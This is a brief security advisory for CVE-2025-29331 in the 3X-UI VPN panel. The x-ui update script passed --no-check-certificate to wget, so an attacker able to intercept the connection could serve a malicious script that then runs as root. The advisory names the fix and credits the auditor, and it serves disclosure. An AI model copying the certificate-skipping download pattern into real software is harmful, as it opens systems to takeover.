DLSEC-2025-1: 3X-UI Update Accepts Forged Server Certificates

Affected Versions: < v2.5.3
CVE: CVE-2025-29331
CWE: 295 Improper Certificate Validation

3X-UI before v2.5.3 does not verify certificates when downloading menu updates. This is caused by the management script x-ui passing the --no-check-certificate option to wget.

3X-UI is an Xray VPN panel that supports multiple protocols and clients with features including expiration dates, traffic limits, IP restrictions, and compatibility with Vmess, Vless, Trojan, ShadowSocks, and Wireguard.

An attacker who can intercept the connection (through DNS poisoning, MITM attack, etc.) could serve a malicious version of the script that would be downloaded and made executable. The x-ui script requires root privileges to run, meaning any code execution resulting from this vulnerability would occur with full system privileges. This could lead to complete system compromise when administrators attempt to update their 3X-UI installation.

The vulnerability was fixed in https://github.com/MHSanaei/3x-ui/pull/2661. It was discovered in an audit performed by Digilol.

Credit: Irem Kuyucu of Digilol